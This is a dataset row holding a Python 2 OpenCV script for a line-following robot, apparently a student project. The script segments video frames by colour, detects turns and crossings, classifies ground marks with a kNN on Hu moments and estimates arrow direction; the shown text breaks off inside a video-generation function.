index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,200 | 21c8befa7df3f766cdb54409180ad396334b84a8 | #!/usr/bin/python
import argparse
import numpy as np
import re
import sys
import time # noqa, disable flycheck warning
from matplotlib import pyplot as plt # noqa, disable flycheck warning
from os import listdir, mkdir
from os.path import isfile, join
from scipy.misc import imread, imsave
from sklearn.neighbors.nearest_centroid import NearestCentroid
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cross_validation import LeaveOneOut # noqa, disable flycheck warning
from sklearn.decomposition import PCA # noqa, disable flycheck warning
import cv2
import select_pixels as sel
# Input video and the default frame id used for training.
VIDEO = 'video2017-3.avi'
TRAIN_IMG = '576'
# Working directories for the different pipeline stages.
TRAIN_DIR = 'TrainFrames'
SEGM_DIR = 'SegmFrames'
NORM_DIR = 'NormFrames'
ANALY_DIR = 'AnalyFrames'
CHULL_DIR = 'ChullFrames'
VID_DIR = 'OutputVideos'
MARK_DIR = 'TrainMark'
# Ground-mark class names (list index == classifier label) and the
# colours used when plotting them.
MARKS = ['Cruz', 'Escalera', 'Persona', 'Telefono']
COLORS = ['red', 'blue', 'green', 'black']
FONT = cv2.FONT_HERSHEY_SIMPLEX
# Globals filled in later: neigh_clf by mark_train(); pca/plx/ply by the
# (currently disabled) PCA visualisation code.  col/marks appear unused here.
neigh_clf = None
pca = None
col = None
marks = None
plx = None
ply = None
class TypeObjAutomaton:
    """Hysteresis counter deciding whether the detected blob is a ground
    mark (recta/giro) or an arrow (cruce).

    recta==giro_izq==giro_dcha, cruce_2_vias==cruce_3_vias.
    On success the counter moves up, on failure it moves down; the sign
    of the counter picks the answer.
    """

    def __init__(self):
        self.state = 0

    def _state(self):
        """Expose the raw counter (debugging helper)."""
        return self.state

    def _reset(self):
        """Drop the counter back to the neutral state."""
        if self.state:
            self.state = 0

    def __shift(self, delta):
        """Move the counter by *delta*.

        Returns 0 (== marca, recta/giro) while the counter is negative,
        1 (== flecha, cruce) otherwise.
        """
        self.state += delta
        return 1 if self.state >= 0 else 0

    def getType(self, state):
        """Feed one observation: truthy decreases, falsy increases."""
        return self.__shift(-1 if state else 1)
class MarkAutomaton:
    """Vote accumulator over the four known ground marks.

    Each call to getType() registers one vote for the predicted class
    and answers with the mark name that has the most votes so far.
    """

    def __init__(self):
        # One vote counter per entry in MARKS.
        self.state = [0] * 4

    def _state(self):
        """Expose the raw vote counters (debugging helper)."""
        return self.state

    def _reset(self):
        """Clear the counters, unless every class already has votes."""
        if not all(self.state):
            self.state = [0] * 4

    def getType(self, pred):
        """Add one vote for *pred* and return the winning mark name."""
        self.state[pred] += 1
        return MARKS[np.argmax(self.state)]
def marking():
    """Step through VIDEO frame by frame and let the user hand-mark
    training pixels; each marked frame pair is saved under TRAIN_DIR.

    Keys: (n)ext frame, (s)top and mark, (q)uit, (p)ause.
    """
    capture = cv2.VideoCapture(VIDEO)
    count = 0  # frame counter; only every 24th frame is offered
    make_dir(TRAIN_DIR)
    pause = False
    while(capture.isOpened()):
        if not pause:
            ret, frame = capture.read()
        if ret and not count % 24:
            cv2.imshow('Image', frame)
            # compare key pressed with the ascii code of the character
            key = cv2.waitKey(1000)
            # key = 1010 0000 0000 1011 0110 1110
            #                              &
            # 0xFF =             1111 1111
            # n==110 =           0110 1110
            # (n)ext image
            if (key & 0xFF) == ord('n'):
                count += 1
                continue
            # mark image, (s)top
            if (key & 0xFF) == ord('s'):
                # change from BGR to RGB format
                im_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
                # mark training pixels
                mark_img = sel.select_fg_bg(im_rgb)
                imsave(join(TRAIN_DIR, 'OriginalImg'+str(count)+'.png'), im_rgb)
                imsave(join(TRAIN_DIR, 'TrainingImg'+str(count)+'.png'), mark_img)
            # (q)uit program
            if (key & 0xFF) == ord('q'):
                break
            # (p)ause program
            if (key & 0xFF) == ord('p'):
                pause = not pause
        elif not ret:
            print "End of video"
            break
        count += 1
    capture.release()
    cv2.destroyAllWindows()
# mark and train_img_m params in case of training knn classifier (marks)
# train with a different training image
def training(mark=False, train_img_m=''):
    """Fit a NearestCentroid colour classifier from a hand-marked frame.

    By default the TRAIN_IMG frame pair is used; with mark=True the
    caller supplies an alternative id in train_img_m (used while
    building the knn mark classifier).  Returns the fitted classifier.
    """
    make_dir(NORM_DIR)
    img_id = train_img_m if mark else TRAIN_IMG
    # Height x Width x channel image pair: the original frame and the
    # copy where the user painted red/green/blue training pixels.
    orig_img = imread(join(TRAIN_DIR, 'OriginalImg' + img_id + '.png'))
    mark_img = imread(join(TRAIN_DIR, 'TrainingImg' + img_id + '.png'))
    # Chromaticity normalisation: every channel is divided by R+G+B.
    # The +0.1 keeps the division away from zero on black pixels.
    img_norm = np.rollaxis((np.rollaxis(orig_img, 2) + 0.1) /
                           (np.sum(orig_img, 2) + 0.1), 0, 3)
    # Collect, per class, the normalised pixels the user painted in pure
    # red (label 0), green (label 1) and blue (label 2).
    samples = []
    labels = []
    for cls, colour in enumerate([(255, 0, 0), (0, 255, 0), (0, 0, 255)]):
        picked = img_norm[np.where(np.all(np.equal(mark_img, colour), 2))]
        samples.append(picked)
        labels.append(np.full(len(picked), cls, dtype=int))
    clf = NearestCentroid()
    clf.fit(np.concatenate(samples), np.concatenate(labels))
    return clf
# mark param to segmentate all the image, not just the 90: pixels
# segm param to show a frame with the segmentated image
def segmentation(clf, frame, count, args, segm, mark=False):
    """Classify every pixel of *frame* with *clf* and return two binary
    images: (line_img, arrow_mark_img), line/mark pixels in white.

    With mark=False only the road region below row 90 is processed;
    with mark=True the whole frame is segmented.  If segm is truthy the
    segmented image is shown in a window, and args.genVideo controls
    dumping intermediate frames to NORM_DIR / SEGM_DIR.
    """
    # Fix: the original else-branch assigned shape/frame_rgb twice in a
    # row (copy-paste duplication); the redundant pair is removed.
    if not mark:
        shape = frame[90:, :].shape
        frame_rgb = cv2.cvtColor(frame[90:, :], cv2.COLOR_BGR2RGB)
    else:
        shape = frame.shape  # Segm all
        frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)  # Segm all
    # Chromaticity normalisation, same transform used in training().
    img_norm = np.rollaxis((np.rollaxis(frame_rgb, 2)+0.1)/(np.sum(frame_rgb, 2)+0.1), 0, 3)
    if args.genVideo and args.genVideo == 'norm':
        imsave(join(NORM_DIR, 'Norm'+str(count)+'.png'), img_norm*255)
    # Reshape in order to reduce the 3-dimensional array to 1-dimensional (needed for predict)
    reshape = img_norm.reshape(shape[0]*shape[1], 3)
    labels = clf.predict(reshape)
    # Reshape back, from 1-dimensional to 2-dimensional
    reshape_back = labels.reshape(shape[0], shape[1])
    # Palette: label 0 -> red (arrow/mark), 1 -> black, 2 -> blue (line).
    paleta = np.array([[255, 0, 0], [0, 0, 0], [0, 0, 255]], dtype=np.uint8)
    # Automatic reshape is being done here, from 2-dimensional to
    # 3-dimensional array [[1, 1, ...]] -> [[[0,0,0], ....]]
    aux = paleta[reshape_back]
    segm_img = cv2.cvtColor(aux, cv2.COLOR_RGB2BGR)
    if segm:
        cv2.imshow('Segm', segm_img)
    if args.genVideo:
        if args.genVideo == 'segm':
            cv2.imwrite(join(SEGM_DIR, 'SegmImg'+str(count)+'.png'), segm_img)
    # Image with the line in white
    line_img = (reshape_back == 2).astype(np.uint8)*255
    # Image with the arrow/mark in white
    arrow_mark_img = (reshape_back == 0).astype(np.uint8)*255
    return line_img, arrow_mark_img
def analysis(clf, args, segm=False):
    """Main per-frame analysis loop.

    Segments each video frame with *clf*, classifies the line shape
    (straight / turn / 2-way / 3-way crossing) via convexity defects,
    classifies any ground mark with the global neigh_clf (Hu moments)
    or derives arrow direction from a fitted ellipse, draws the results
    and handles interactive keys (n/q/p).
    """
    if VIDEO == '0':
        capture = cv2.VideoCapture(0)  # '0' selects the live camera
    else:
        capture = cv2.VideoCapture(VIDEO)
    count = 0
    latest_org = 0
    if args.genVideo:
        if args.genVideo == 'segm':
            make_dir(SEGM_DIR)
        elif args.genVideo == 'norm':
            make_dir(NORM_DIR)
        elif args.genVideo == 'analy':
            make_dir(ANALY_DIR)
        elif args.genVideo == 'chull':
            make_dir(CHULL_DIR)
    pause = False
    type_aut = TypeObjAutomaton()
    mark_aut = MarkAutomaton()
    while(capture.isOpened()):
        if not pause:
            ret, frame = capture.read()
        # if ret and not count % 24:
        if ret:
            # if video == '0':
            #     ret = capture.set(3, 340)
            #     ret = capture.set(240)
            cv2.imshow('Original', frame)
            line_img, arrow_mark_img = segmentation(clf, frame, count, args, segm)
            # FindContours is destructive, so we copy make a copy
            line_img_cp = line_img.copy()
            # FindContours is destructive, so we copy make a copy
            arrow_mark_img_cp = arrow_mark_img.copy()
            # Should we use cv2.CHAIN_APPROX_NONE? or cv2.CHAIN_APPROX_SIMPLE? the former stores all points, the latter stores the basic ones
            # Find contours of line
            cnts_l, hier = cv2.findContours(line_img, cv2.RETR_LIST,
                                            cv2.CHAIN_APPROX_NONE)
            # Find contours of arror/mark
            cnts_am, hier = cv2.findContours(arrow_mark_img, cv2.RETR_LIST,
                                             cv2.CHAIN_APPROX_NONE)
            # Removes small contours, i.e: small squares
            newcnts_l = [cnt for cnt in cnts_l if len(cnt) > 100]
            newcnts_am = [cnt for cnt in cnts_am if len(cnt) > 75]
            # DrawContours is destructive
            # analy = frame.copy()[90:]
            analy = frame.copy()
            # Return list of indices of points in contour
            chull_list_l = [cv2.convexHull(cont, returnPoints=False) for cont in newcnts_l]
            chull_list_am = [cv2.convexHull(cont, returnPoints=False) for cont in newcnts_am]
            # print "chull_list_l: ", len(chull_list_l)
            # for idx, ccc in enumerate(chull_list_l):
            #     print "idx: ", idx, "ccc: ", ccc
            #     print "size_ccc: ", len(ccc)
            # Return convexity defects from previous contours, each contour must have at least 3 points
            # Convexity Defect -> [start_point, end_point, farthest_point, distance_to_farthest_point]
            conv_defs_l = [(cv2.convexityDefects(cont, chull), pos) for pos, (cont, chull) in
                           enumerate(zip(newcnts_l, chull_list_l)) if len(cont) > 3 and len(chull) > 3]
            conv_defs_am = [(cv2.convexityDefects(cont, chull), pos) for pos, (cont, chull) in
                            enumerate(zip(newcnts_am, chull_list_am)) if len(cont) > 3 and len(chull) > 3]
            list_conv_defs_l = []
            list_cont_l = []
            list_conv_defs_am = []
            list_cont_am = []
            # Only save the convexity defects whose hole is larger than ~4 pixels (1000/256).
            # NOTE(review): el is a (defects, pos) tuple and is never None;
            # presumably the guard was meant for el[0] (convexityDefects can
            # return None) -- confirm.
            for el in conv_defs_l:
                if el is not None:
                    aux = el[0][:, :, 3] > 1000
                    if any(aux):
                        list_conv_defs_l.append(el[0][aux])  # el = (convDefs, position)
                        list_cont_l.append(newcnts_l[el[1]])
            for el in conv_defs_am:
                if el is not None:
                    aux = el[0][:, :, 3] > 1000
                    if any(aux):
                        list_conv_defs_am.append(el[0][aux])
                        list_cont_am.append(newcnts_am[el[1]])
            mark = True
            # No significant defects on the line -> the track is straight.
            if not list_conv_defs_l:
                cv2.putText(analy, "Linea recta", (0, 140),
                            FONT, 0.5, (0, 0, 0), 1)
            for pos, el in enumerate(list_conv_defs_l):
                for i in range(el.shape[0]):
                    if el.shape[0] == 1:
                        # One defect: a turn; the fitted line's slope tells left/right.
                        # [NormX, NormY, PointX, PointY]
                        [vx, vy, x, y] = cv2.fitLine(list_cont_l[pos], cv2.cv.CV_DIST_L2, 0, 0.01, 0.01)
                        slope = vy/vx
                        if slope > 0:
                            cv2.putText(analy, "Giro izq", (0, 140),
                                        FONT, 0.5, (0, 0, 0), 1)
                        else:
                            cv2.putText(analy, "Giro dcha", (0, 140),
                                        FONT, 0.5, (0, 0, 0), 1)
                    elif el.shape[0] == 2 or el.shape[0] == 3:
                        cv2.putText(analy, "Cruce 2 salidas", (0, 140),
                                    FONT, 0.5, (0, 0, 0), 1)
                        mark = False
                    elif el.shape[0] == 4:
                        cv2.putText(analy, "Cruce 3 salidas", (0, 140),
                                    FONT, 0.5, (0, 0, 0), 1)
                        mark = False
                    if args.genVideo and args.genVideo == 'chull':
                        # Draw convex hull and hole
                        s, e, f, d = el[i]
                        start = tuple(list_cont_l[pos][s][0])
                        end = tuple(list_cont_l[pos][e][0])
                        far = tuple(list_cont_l[pos][f][0])
                        cv2.line(analy, start, end, [0, 255, 0], 2)
                        cv2.circle(analy, far, 3, [0, 0, 255], -1)
            if args.genVideo and args.genVideo == 'chull':
                for pos, el in enumerate(list_conv_defs_am):
                    for i in range(el.shape[0]):
                        # Draw convex hull and hole
                        s, e, f, d = el[i]
                        start = tuple(list_cont_am[pos][s][0])
                        end = tuple(list_cont_am[pos][e][0])
                        far = tuple(list_cont_am[pos][f][0])
                        cv2.line(analy, start, end, [0, 255, 0], 2)
                        cv2.circle(analy, far, 3, [0, 0, 255], -1)
            if not newcnts_am:
                # Nothing detected on the floor: reset both automatons.
                type_aut._reset()
                mark_aut._reset()
            else:
                # getType() == 0 means "marca": classify the blob by its Hu moments.
                if not type_aut.getType(mark):
                    if len(newcnts_am) == 1:
                        hu_mom = cv2.HuMoments(cv2.moments(newcnts_am[0])).flatten()
                        # hu_mom2 = -np.sign(hu_mom)*np.log10(np.abs(hu_mom))
                        pred = neigh_clf.predict([hu_mom])
                        if pred == 0:
                            cv2.putText(analy, "Cruz", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        elif pred == 1:
                            cv2.putText(analy, "Escalera", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        elif pred == 2:
                            cv2.putText(analy, "Persona", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        elif pred == 3:
                            cv2.putText(analy, "Telefono", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        # pr_pca = pca.transform(hu_mom.reshape(1, -1))
                        # for pos, p in enumerate(plx):
                        #     plt.scatter(p, ply[pos], label=MARKS[pos], color=COLORS[pos])
                        # plt.scatter(pr_pca[0, 0], pr_pca[0, 1], label="ToPredict", color="cyan")
                        # plt.legend()
                        # plt.show()
                        # cv2.putText(analy, mark_aut.getType(pred[0]), (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                    else:
                        cv2.putText(analy, "Flecha", (0, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                # Fit an ellipse to each blob to derive the arrow orientation.
                for c in newcnts_am:
                    ellipse = cv2.fitEllipse(c)
                    center, axis, angle = ellipse
                    # Axis angles, major, minor
                    maj_ang = np.deg2rad(angle)
                    min_ang = maj_ang + np.pi/2
                    # Axis lenghts
                    major_axis = axis[1]
                    minor_axis = axis[0]
                    # Lines of axis, first line and his complementary
                    lineX1 = int(center[0]) + int(np.sin(maj_ang)*(major_axis/2))
                    lineY1 = int(center[1]) - int(np.cos(maj_ang)*(major_axis/2))
                    lineX2 = int(center[0]) - int(np.sin(maj_ang)*(major_axis/2))
                    lineY2 = int(center[1]) + int(np.cos(maj_ang)*(major_axis/2))
                    if args.genVideo and args.genVideo == 'chull':
                        linex1 = int(center[0]) + int(np.sin(min_ang)*(minor_axis/2))
                        liney1 = int(center[1]) - int(np.cos(min_ang)*(minor_axis/2))
                        cv2.line(analy, (int(center[0]), int(center[1])), (lineX1, lineY1), (0, 0, 255), 2)
                        cv2.line(analy, (int(center[0]), int(center[1])), (linex1, liney1), (255, 0, 0), 2)
                        cv2.circle(analy, (int(center[0]), int(center[1])), 3, (0, 0, 0), -1)
                        cv2.ellipse(analy, ellipse, (0, 255, 0), 2)
                        cv2.putText(analy, "Ang. elipse: "+str(angle), (0, 110),
                                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                    # Get coordinates of arrow pixels
                    # arrow = cv2.findNonZero(arrow_mark_img_cp)[:, 0, :]
                    idx = np.where(arrow_mark_img_cp != 0)
                    size_idx = len(idx[0])
                    arrow = np.array([[idx[1][idy], idx[0][idy]] for idy in range(size_idx)])
                    angle360 = angle  # Initial angle in [0,180)
                    # Disambiguate the ellipse's 180-degree symmetry by
                    # checking on which side of the centre most arrow
                    # pixels lie (the head is the denser half).
                    if 45 <= angle <= 135:  # Arrow kind of horizontal -> cut in vertical
                        # Divide arrow in two lists depending on X coordinate of the center
                        left = [1 for px in arrow if px[0] < center[0]]
                        right = [1 for px in arrow if px[0] > center[0]]
                        if len(right) >= len(left):
                            peak = (lineX1, lineY1)  # Arrow peak is the point in major axis 1
                        else:
                            peak = (lineX2, lineY2)  # Arrow peak is the point in major axis 2
                            angle360 += 180  # Real angle in [0,360)
                    else:  # Arrow kind of vertical -> cut in horizontal
                        # Divide arrow in two lists depending on Y coordinate of the center
                        up = [1 for px in arrow if px[1] < center[1]]
                        down = [1 for px in arrow if px[1] > center[1]]
                        if (len(up) >= len(down) and angle < 45) or (len(down) >= len(up) and angle > 135):
                            peak = (lineX1, lineY1)  # Arrow peak is the point in major axis 1
                        else:
                            peak = (lineX2, lineY2)  # Arrow peak is the point in major axis 2
                            angle360 += 180
                    angle360 = int(angle360)
                    hasLine = 1
                    # Map the full-circle angle onto 8 compass directions;
                    # lineDistance encodes which image border to look at next.
                    if angle360 >= 337.5 or angle360 < 22.5:
                        cv2.putText(analy, "Norte (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = 0
                    elif angle360 < 67.5:
                        cv2.putText(analy, "Noreste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = -0.25
                    elif angle360 < 112.5:
                        cv2.putText(analy, "Este (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = -0.5
                    elif angle360 < 157.5:
                        cv2.putText(analy, "Sureste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = -0.8
                    elif angle360 < 202.5:
                        cv2.putText(analy, "Sur (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = 1
                    elif angle360 < 247.5:
                        cv2.putText(analy, "Suroeste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = 0.8
                    elif angle360 < 292.5:
                        cv2.putText(analy, "Oeste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = 0.5
                    elif angle360 < 337.5:
                        cv2.putText(analy, "Noroeste (ang: "+str(angle360)+")", (0, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 1)
                        lineDistance = 0.25
                    cv2.line(analy, (int(peak[0]), int(peak[1])), (int(center[0]), int(center[1])), (0, 0, 255), 2)
                    cv2.circle(analy, (int(peak[0]), int(peak[1])), 3, (0, 255, 0), -1)
            # Look for line contours touching each image border; their mean
            # points are candidate entry/exit points of the track.
            left_border = line_img_cp[:, :20].copy()
            right_border = line_img_cp[:, 300:].copy()
            top_border = line_img_cp[:20, 20:300].copy()
            bot_border = line_img_cp[220:, 20:300].copy()
            all_mlc = []
            all_mrc = []
            all_mtc = []
            all_mbc = []
            left_cnt, hier = cv2.findContours(left_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
            left_cnt = [cnt for cnt in left_cnt if cv2.contourArea(cnt) > 50]
            if left_cnt:
                for l in left_cnt:
                    mlc = np.mean(l[:, :, :], axis=0, dtype=np.int32)
                    all_mlc.append(mlc)
                    cv2.circle(analy, (mlc[0, 0], mlc[0, 1]), 3, (0, 255, 0), -1)
            right_cnt, hier = cv2.findContours(right_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
            right_cnt = [cnt for cnt in right_cnt if cv2.contourArea(cnt) > 50]
            if right_cnt:
                for r in right_cnt:
                    # Shift the crop-local x coordinates back to frame space.
                    r[:, :, 0] = r[:, :, 0] + 300
                    mrc = np.mean(r[:, :, :], axis=0, dtype=np.int32)
                    all_mrc.append(mrc)
                    cv2.circle(analy, (mrc[0, 0], mrc[0, 1]), 3, (0, 255, 0), -1)
            top_cnt, hier = cv2.findContours(top_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
            top_cnt = [cnt for cnt in top_cnt if cv2.contourArea(cnt) > 50]
            if top_cnt:
                for t in top_cnt:
                    t[:, :, 0] = t[:, :, 0] + 20
                    mtc = np.mean(t[:, :, :], axis=0, dtype=np.int32)
                    all_mtc.append(mtc)
                    cv2.circle(analy, (mtc[0, 0], mtc[0, 1]), 3, (0, 255, 0), -1)
            bot_cnt, hier = cv2.findContours(bot_border, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
            bot_cnt = [cnt for cnt in bot_cnt if cv2.contourArea(cnt) > 50]
            if bot_cnt:
                for b in bot_cnt:
                    b[:, :, 0] = b[:, :, 0] + 20
                    b[:, :, 1] = b[:, :, 1] + 220
                    mbc = np.mean(b[:, :, :], axis=0, dtype=np.int32)
                    all_mbc.append(mbc)
                    cv2.circle(analy, (mbc[0, 0], mbc[0, 1]), 3, (255, 0, 255), -1)
            # # n_puntos = len(all_mtc) + len(all_mlc) + len(all_mrc) + len(all_mbc)
            # # mark = True
            # # if n_puntos == 2:
            # #     if len(all_mlc):
            # #         print "Curva a izquierda"
            # #     elif len(all_mrc):
            # #         print "Curva a derecha"
            # #     else:
            # #         print "Recta"
            # # elif n_puntos == 3:
            # #     print "Cruce 2 salidas"
            # #     mark = False
            # # elif n_puntos == 4:
            # #     print "Cruce 3 salidas"
            # #     mark = False
            # # else:
            # #     print "No tengo ni idea de que es, n_puntos: ", n_puntos, \
            # #         " top: ", len(all_mtc), " left: ", len(all_mlc), " right: ", len(all_mrc), " bot: ", len(all_mbc)
            # if all_mbc:
            #     org = all_mbc[np.argmin([abs(160 - mbc[0, 0]) for mbc in all_mbc])]  # compare bottom points with the center of the image - horizontally
            #     latest_org = org
            # else:
            #     org = latest_org
            # if not mark:
            #     if all_mtc and (lineDistance == 0 or lineDistance == -0.25 or lineDistance == 0.25):  # norte
            #         dst = all_mtc[np.argmin([mtc[0, 1] for mtc in all_mtc])]
            #     elif all_mrc and (lineDistance == -0.5 or lineDistance == -0.8):  # este
            #         dst = all_mrc[np.argmin([mrc[0, 1] for mrc in all_mrc])]
            #     elif all_mlc and (lineDistance == 0.5 or lineDistance == 0.8):  # oeste
            #         dst = all_mlc[np.argmin([mlc[0, 1] for mlc in all_mlc])]
            #     else:
            #         dst = np.array([[160, 120]])
            # else:
            #     # print "Entro?"
            #     # print "all_mtc: ", all_mtc
            #     # print "all_mlc: ", all_mlc
            #     # print "all_mrc: ", all_mrc
            #     # print "all_mbc: ", all_mbc
            #     if len(all_mtc) != 0:
            #         # print "primero"
            #         dst = all_mtc[0]
            #     elif len(all_mlc) != 0:
            #         # print "segundo"
            #         dst = all_mlc[0]
            #     elif len(all_mrc) != 0:
            #         # print "tercero"
            #         dst = all_mrc[0]
            #     elif len(all_mbc) > 1:
            #         # print "cuarto"
            #         dst = all_mbc[np.argmax([abs(160 - mbc[0, 0]) for mbc in all_mbc])]
            #     # print "Entro! dst: ", dst
            # org_dst = np.array([org[0], dst[0]])  # tam 2 (1 es punto origen, 2 punto salida)
            # # print "org_dst: ", org_dst
            # cv2.circle(analy, (org_dst[0, 0], org_dst[0, 1]), 3, (229, 9, 127), -1)
            # cv2.circle(analy, (org_dst[1, 0], org_dst[1, 1]), 3, (229, 9, 127), -1)
            if args.genVideo and args.genVideo == 'chull':
                cv2.drawContours(analy, left_cnt, -1, (255, 0, 0), 2)
                cv2.drawContours(analy, right_cnt, -1, (0, 255, 0), 2)
                cv2.drawContours(analy, top_cnt, -1, (255, 0, 255), 2)
                cv2.drawContours(analy, bot_cnt, -1, (0, 0, 255), 2)
                cv2.drawContours(analy, newcnts_l, -1, (255, 0, 0), 1)
                cv2.drawContours(analy, newcnts_am, -1, (0, 0, 255), 1)
            cv2.imshow("Contours", analy)
            # if args.genVideo:
            #     if args.genVideo == 'analy':
            #         cv2.imwrite(join(ANALY_DIR, 'AnalyImg'+str(count)+'.png'), analy)
            #     elif args.genVideo == 'chull':
            #         cv2.imwrite(join(CHULL_DIR, 'ChullImg'+str(count)+'.png'), analy)
            # compare key pressed with the ascii code of the character
            key = cv2.waitKey(10)
            # (n)ext image
            if (key & 0xFF) == ord('n'):
                count += 1
                continue
            # (q)uit program
            if (key & 0xFF) == ord('q'):
                break
            # (p)ause program
            if (key & 0xFF) == ord('p'):
                pause = not pause
        elif not ret:
            print "End of video"
            break
        count += 1
    capture.release()
    cv2.destroyAllWindows()
# def mark_train(args):
# global plx, ply, pca, neigh_clf
# clf = training(mark=True, train_img_m='9999')
# all_hu = []
# labels = []
# for idx, m in enumerate(MARKS):
# files = [join(MARK_DIR, m, 'chosen', f)
# for f in listdir(join(MARK_DIR, m, 'chosen'))]
# h = []
# l = []
# for i in files:
# frame = imread(i)
# frame_bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
# _, arrow_mark_img = segmentation(clf, frame_bgr, 0, args, segm=False, mark=True)
# cnts, hier = cv2.findContours(arrow_mark_img, cv2.RETR_LIST,
# cv2.CHAIN_APPROX_NONE)
# cnts = [cnt for cnt in cnts if cv2.contourArea(cnt) > 75]
# hu_mom = cv2.HuMoments(cv2.moments(cnts[0])).flatten()
# h.append(hu_mom)
# l.append(idx)
# all_hu.append(h)
# labels.append(l)
# all_hu = np.array(all_hu)
# # with open('dataset.rob', 'wb') as f:
# # np.savetxt(f, all_hu.reshape(400, 7))
# labels = np.array(labels)
# q_n = 1
# cov_list = np.cov(all_hu.reshape(400, 7).T)
# neigh = KNeighborsClassifier(n_neighbors=q_n, weights='distance',
# metric='mahalanobis', metric_params={'V': cov_list})
# loo = LeaveOneOut(100)
# s = 4*99
# fallo_cruz = 0
# fallo_escalera = 0
# fallo_persona = 0
# fallo_telefono = 0
# for train_idx, test_idx in loo:
# neigh.fit(all_hu[:, train_idx].reshape((s, 7)), labels[:, train_idx].reshape((s,)))
# res = neigh.predict(all_hu[:, test_idx].reshape(4, 7))
# if res[0] != 0:
# fallo_cruz += 1
# if res[1] != 1:
# fallo_escalera += 1
# if res[2] != 2:
# fallo_persona += 1
# if res[3] != 3:
# fallo_telefono += 1
# print "q-NN: ", q_n
# print "Acierto Cruz (%): ", 100-fallo_cruz
# print "Acierto Escalera (%): ", 100-fallo_escalera
# print "Acierto Persona (%): ", 100-fallo_persona
# print "Acierto Telefono (%): ", 100-fallo_telefono
# # s = 4*100
# # fallo_cruz = 0
# # fallo_escalera = 0
# # fallo_persona = 0
# # fallo_telefono = 0
# # pca = PCA(n_components=2)
# # tr_data = pca.fit_transform(all_hu.reshape((s, 7)))
# # tr_label = labels.reshape((s,))
# # plx = [[], [], [], []]
# # ply = [[], [], [], []]
# # for idx, el in enumerate(tr_data):
# # ps = tr_label[idx]
# # plx[ps].append(el[0])
# # ply[ps].append(el[1])
# # for pos, p in enumerate(plx):
# # plt.scatter(p, ply[pos], label=MARKS[pos], color=COLORS[pos])
# # plt.legend()
# # plt.show()
# # sys.exit()
# # neigh.fit(all_hu.reshape((s, 7)), labels.reshape((s,)))
# # for idx in range(100):
# # res = neigh.predict(all_hu[:, idx].reshape(4, 7))
# # if res[0] != 0:
# # fallo_cruz += 1
# # if res[1] != 1:
# # fallo_escalera += 1
# # if res[2] != 2:
# # fallo_persona += 1
# # if res[3] != 3:
# # fallo_telefono += 1
# # print "K-neighbors: ", k_n
# # print "% Acierto Cruz: ", 100-fallo_cruz
# # print "% Acierto Escalera: ", 100-fallo_escalera
# # print "% Acierto Persona: ", 100-fallo_persona
# # print "% Acierto Telefono: ", 100-fallo_telefono
# neigh_clf = neigh
def mark_train(args):
    """Fit the global 1-NN (Mahalanobis) ground-mark classifier.

    Loads the precomputed Hu-moment dataset and its labels from disk,
    fits a KNeighborsClassifier, publishes it in the module-level
    ``neigh_clf`` and also returns it.
    """
    global neigh_clf
    hu_data = np.load('moments.hu')
    hu_labels = np.load('moments.labels')
    n_images = 4 * 100  # 4 mark classes x 100 samples each
    flat_hu = hu_data.reshape((n_images, 7))
    # Covariance of the 7 Hu moments, required by the Mahalanobis metric.
    cov_list = np.cov(flat_hu.T)
    neigh = KNeighborsClassifier(n_neighbors=1, weights='distance',
                                 metric='mahalanobis',
                                 metric_params={'V': cov_list})
    neigh.fit(flat_hu, hu_labels.reshape((n_images,)))
    neigh_clf = neigh
    return neigh
def gen_video(name, procedure):
    """Assemble the frames previously dumped by *procedure* into an AVI
    file called <name>.avi inside VID_DIR.

    procedure is one of 'segm'/'norm'/'analy'/'chull' and selects which
    frame directory is turned into a video.
    """
    make_dir(VID_DIR)
    aux_dir = None
    # Map the requested procedure onto its frame directory.
    if procedure == 'segm':
        aux_dir = SEGM_DIR
    elif procedure == 'norm':
        aux_dir = NORM_DIR
    elif procedure == 'analy':
        aux_dir = ANALY_DIR
    elif procedure == 'chull':
        aux_dir = CHULL_DIR
    images = [f for f in listdir(aux_dir) if isfile(join(aux_dir, f))]
    if not len(images):
        print "No images to create the video."
        sys.exit()
    # Frame files carry a numeric suffix: sort numerically, not lexically.
    images = natural_sort(images)
    # Use the first frame to fix the output video geometry.
    aux = cv2.imread(join(aux_dir, images[0]))
    height, width, layers = aux.shape
